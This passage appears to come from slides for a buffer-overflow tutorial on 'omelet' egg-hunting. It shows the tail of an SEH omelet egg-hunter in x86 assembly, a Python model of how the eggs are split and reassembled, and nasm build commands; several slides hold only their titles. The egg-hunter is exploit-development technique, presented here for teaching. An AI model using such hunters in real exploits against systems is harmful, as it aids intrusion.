    POPA                            ; ESI = [ESP + 4] -> struct exception_info
    LEA ESP, [BYTE ESI+0x18]        ; ESP = struct exception_info->exception_address
    POP EAX                         ; EAX = exception address 0x????????
    OR AX, 0xFFF                    ; EAX = 0x?????FFF
    INC EAX                         ; EAX = 0x?????FFF + 1 -> next page
    JS done                         ; EAX > 0x7FFFFFFF ===> done
    XCHG EAX, EDI                   ; EDI => next page
    JMP reset_stack
done:
    XOR EAX, EAX                    ; EAX = 0
    CALL [BYTE FS:EAX + 8]          ; call the reassembled shellcode at the bottom of the stack (FS:[8])

db marker_bytes_location
db max_index_location
db egg_size_location
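A Python model of the scan, marker check and copy steps analysed above for w32_SEH_omelet.asm, and of the EBX stop counter added in custom_w32_SEH_omelet.asm, added here as an example; it is not the page's code and not Skylined's omelet tooling. The function names (make_eggs, check_header, hunt), the start/stop_after parameters and the SHELLCODE/MEMORY image are constructed for this example; the egg layout, the XOR/CMP arithmetic and the marker 0xBADA55 come from the slides.

```python
import struct


def marker_bytes(marker):
    """Bytes M1 M2 M3 that follow the index byte II in every egg.

    The hunter LODSDs II M1 M2 M3 and XORs the little-endian dword with
    (marker << 8) + 0xFF, so M1 M2 M3 are the marker's low, middle and high
    byte in that order (0xBADA55 -> 55 DA BA, as in the page's eggs).
    """
    return struct.pack("<I", marker << 8)[1:]


def make_eggs(shellcode, egg_size, marker, filler=b"\x40"):
    """Split shellcode into LL II M1 M2 M3 DD... eggs (egg_size = data bytes per
    egg, II = 0xFF ^ index); the last egg is padded with INC EAX like egg3."""
    eggs = []
    for index, off in enumerate(range(0, len(shellcode), egg_size)):
        data = shellcode[off:off + egg_size]
        data += filler * (egg_size - len(data))
        eggs.append(bytes([egg_size, 0xFF ^ index]) + marker_bytes(marker) + data)
    return eggs


def check_header(dword, marker, max_index):
    """LODSD / XOR / CMP EAX, max_index: the egg index, or None when the four
    bytes after an LL byte are not a marker (the JA reset_stack case)."""
    index = struct.unpack("<I", dword)[0] ^ ((marker << 8) + 0xFF)
    return index if index <= max_index else None


def hunt(memory, egg_size, marker, max_index, start=0, stop_after=None):
    """Scan `memory` upward from `start` and reassemble the basket.

    start      models XOR EDI,EDI (0) or the MOV DI / SHL EDI prefix of
               "modified shell code 1" that begins the scan at 0xFC000.
    stop_after models the EBX counter of custom_w32_SEH_omelet.asm; None is
               the original, which only reaches `done` after scanning to the
               top of memory (here: the end of the image).
    """
    basket = bytearray(egg_size * (max_index + 1))
    found, pos = 0, start
    while True:
        pos = memory.find(bytes([egg_size]), pos)       # REPNE SCASB
        if pos < 0 or pos + 5 + egg_size > len(memory):
            break                                        # no full egg can follow
        pos += 1                                         # EDI is now past LL
        index = check_header(memory[pos:pos + 4], marker, max_index)
        if index is None:
            continue                                     # resume scanning at EDI
        data = pos + 4
        basket[index * egg_size:(index + 1) * egg_size] = memory[data:data + egg_size]
        pos = data + egg_size                            # MOV EDI, ESI
        found += 1
        if stop_after is not None and found == stop_after:
            break                                        # CMP EBX, -1 / JE done
    return bytes(basket)


# Constructed test image: a stand-in "shellcode" split into three eggs that are
# scattered out of order between junk and two decoy 0x04 bytes.
SHELLCODE = b"ABCDEFGHIJ"
EGGS = make_eggs(SHELLCODE, 4, 0xBADA55)
MEMORY = (b"\x90" * 7 + EGGS[2] + b"\x04\xFF\x55\xDA\x00" + b"\x00" * 5
          + EGGS[0] + b"\x04" + b"\x41" * 6 + EGGS[1] + b"\x04")

if __name__ == "__main__":
    print(hunt(MEMORY, 4, 0xBADA55, 2))                  # b'ABCDEFGHIJ@@'
    print(hunt(MEMORY, 4, 0xBADA55, 2, stop_after=2))    # b'ABCD\x00\x00\x00\x00IJ@@'
```

Running it shows the two failure modes the modifications introduce: stopping after too few eggs, or starting the scan past the first egg, leaves zero-filled holes in the basket.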

Page 78: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm build

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>"c:\Program Files\nasm\nasm.exe" -f bin -o custom_w32_SEH_omelet.bin custom_w32_SEH_omelet.asm -w+error

C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py custom_w32_SEH_omelet.bin shellcode.bin calceggs_custom.txt 127 0xBADA55

Page 79: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm


Page 80: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm


Page 81: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm


Page 82: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

How to make an Omelet Egg-Hunter?


custom_w32_SEH_omelet.asm


Page 83: System Hacking Tutorial #3 - Buffer Overflow - Egg Hunting

Thank You :)

See you the week after next week